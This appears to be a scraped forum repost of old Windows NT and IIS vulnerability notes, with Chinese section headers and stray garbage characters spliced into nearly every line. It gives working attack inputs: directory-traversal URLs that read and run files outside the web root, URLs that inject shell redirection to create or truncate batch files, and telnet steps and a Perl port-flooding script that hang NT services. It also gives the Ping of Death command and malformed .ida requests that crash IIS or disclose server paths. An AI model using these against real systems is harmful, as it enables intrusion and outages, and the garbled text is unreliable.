受影響系統(tǒng):4.0,iis 1.0 W' r- n" M& K g
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
! _1 G- c! O5 J
/ ^8 m9 M( h8 |( [ X# \, {" ^A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
; d! R& i$ n7 d6 `; Z1 p; L3 _$ W5 ~
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.8 Y6 D3 |* q' [! y. N8 G
; w8 [0 l- u: F, o--------------------------------------------------------------------
- R# z1 H& V* X6 h/ g" j T) [* q% Z2 G0 j) }0 `4 Y/ @
受影響系統(tǒng):4.01 J% ^2 ]& S4 J; p% [
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
( T2 C% d0 e( V: j" J/ [! f
; f+ D5 v* M3 NIf the file 'target.bat' exists, the file will be truncated.. V9 P" p9 W% U# t& G' [
1 z8 u; U3 G" q
7 \1 H. ~4 n1 o$ j. SA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.( k0 D0 Z4 x% k- T; v
: K# q# A) c X6 X: \* D----------------------------------------------------------------------# N+ _9 n/ Z; O' ^ u6 r |$ J
/ L4 l) x/ @4 {8 b: c, B
受影響系統(tǒng):3.51,4.0
5 U( z" d9 v h+ q% Q5 J0 y9 Y5 K nMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
0 I& @2 x* e+ r, V+ o6 D- A! b8 }
The following steps;
- c+ t- f- F- ~8 L+ l& u
) i5 B# O8 a8 T: g5 `( ~Telnet to an NT 4.0 system on port 135 * D$ I: `5 b% d( }$ K* H/ Z
Type about 10 characters followed by a <CR> - S5 }" y; I9 x% Q4 D
Exit Telnet
3 l3 N2 s9 |4 @: G0 a! T- _4 @results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
' i- K0 V" M2 C9 P- }, z7 n1 T, D7 |1 b! l9 D! n
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
- E; l/ h5 a# O. t' `& `7 ^
# k P7 {' Y4 @The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
! ~* y$ ~6 t0 b: K# ~
6 |8 y; y0 R& w, {# aIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
' x# w2 M: w$ h) ^) o& f; ^. A
1 N1 N3 t! D9 z. R. SThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):% k. X5 D: b6 c
" Y% B8 H: ]- ~: W/ I
/*begin poke code*/7 ]' v6 ~9 R$ P& m! E" b% w
- M/ d, S" G' h, m( j M7 `use Socket;# Y7 h0 s5 h! Z& K+ J. t3 D
use FileHandle;
1 `6 K Q5 F* rrequire "chat2.pl";% d- a" @ Q/ X3 V; t4 P
: O+ S% N5 ?# P$systemname = $ARGV[0] && shift;6 e! P# C- e8 t! O8 C
- E5 ? ~$ j# M. N1 O
$verbose = 1; # tell me what you're hitting0 K. u5 t( I* u
$knownports = 1; # don't hit known problem ports
; t3 g" h& k6 n* ^$ P1 Bfor ($port = $0; $port<65535; $port++) 4 p5 X, Q0 }8 E2 D2 `
{
; u. v4 Z4 ~; A: x+ v, R' J( g, a: ]" `1 F C1 B, V( {
7 d0 i$ `4 e* o
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {% P. W) [' k O& d4 k, M
next;
4 p6 J a) t; h6 \ Y# G}1 n! L% v1 H e
$fh = chat::open_port($systemname, $port);
- J2 A* p5 F' z% i, Qchat::print ($fh,"This is about ten characters or more");4 f! l F6 t; ~! _" ~1 r- e
if ($verbose) {- q x! m' T) d
print "Trying port: $port\n";
9 V( W# z; N( _& [) Y2 C" q} 5 ]- I6 R% v5 m& f1 W$ j
chat::close($fh);
, N$ R i o- Q$ `/ B# s2 _) g$ i4 q$ ^" m# M( L0 W, m+ I# m" `" a
}
, O% V4 H0 E% m9 P2 r) p( S) n; q3 O& o9 D- `
9 w! ]$ u P% X2 s4 f/*end poke code*/
! }2 \2 J& |* G0 l0 x5 ?' ~& u# N' C5 m, v3 t, U/ v3 h+ q( @
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername5 b# R7 u B' W; |
' @; P2 [( _+ B--------------------------------------------------------------------------------
0 B) w/ Z4 _* \3 M- Q& z* ?. @" s, D: b
受影響系統(tǒng):4.0# F% O0 b6 q u# X ~$ A" z
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.' J, s7 Q$ X$ C D
8 `" i7 R# A+ DThis attack causes Dr. Watson to display an alert window and to log an error: 6 f- a5 g+ P& D- @. e
$ E9 F5 {- [, H& v l"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"4 X' ~* H8 E# J
- ]' z! H! m4 f4 j: }9 v--------------------------------------------------------------------------------6 m/ r, Y: j0 f$ J( e+ Z" T. `
, U2 Y0 N2 @7 O1 e( r
受影響系統(tǒng):3.51,4.0
# W6 J& z: v5 T3 N5 L8 D' \Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:" D$ y+ A9 w2 ~+ ^( ~
( L$ a. E* n8 b' l: G2 _
STOP: 0X0000001E/ |3 j& z- c( F7 y! j
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS2 \) u! y6 o3 S
- K/ C, d+ [5 T' @( j" X-OR-
4 q+ p( l" }$ @
5 P5 z: B( s M. _STOP: 0x0000000A
! e! j5 D: R: DIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
. A8 q4 H0 O1 X, A* b3 E+ ~/ u; f
- k% ]8 W& M4 X+ U7 lNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
3 B! [% `) o" r# C6 ~" ~7 b5 B# @3 @0 n- L. N
--------------------------------------------------------------------------------
5 D: M' J- y, E" {) a6 V
3 s9 H1 o2 D$ H, z: J0 ~Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). ) q. p! x( z7 d2 f
; v1 B0 H* m& y9 s: I2 J( G8 U
--------------------------------------------------------
; i8 F! p2 @+ p% D7 l) E+ u2 [2 [. {, V# z1 \" c
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |